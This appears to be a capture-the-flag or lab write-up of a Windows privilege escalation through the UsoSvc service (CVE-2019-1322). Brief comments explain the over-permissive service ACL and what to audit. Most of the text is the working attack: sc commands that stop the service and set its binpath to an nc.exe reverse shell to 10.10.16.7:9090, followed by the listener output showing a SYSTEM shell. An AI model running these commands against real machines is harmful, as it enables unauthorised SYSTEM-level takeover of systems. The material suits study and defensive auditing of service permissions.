8 privesc_2 UsoSvc

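# PEAS output shows our current user has full access to the UsoSvc service, i.e. it is allowed to change the service configuration.
# UsoSvc runs as LocalSystem (see SERVICE_START_NAME in the qc output below), so whatever binpath is set gets executed as SYSTEM when the service starts.
# Root cause is the over-permissive ACL on the service (CVE-2019-1322, reference below). A binpath change is stored as the ImagePath value under the service's registry key, so that value and the service ACL are what to audit.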
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc

C:\inetpub\new-site>sc stop UsoSvc
sc stop UsoSvc

SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x6
        WAIT_HINT          : 0x7530

C:\inetpub\new-site>sc query UsoSvc
sc query UsoSvc

SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\inetpub\new-site>sc.exe config UsoSvc binpath= "C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe"
sc.exe config UsoSvc binpath= "C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\inetpub\new-site>sc.exe qc usosvc
sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
C:\inetpub\new-site>sc start UsoSvc

$ nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 53623
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
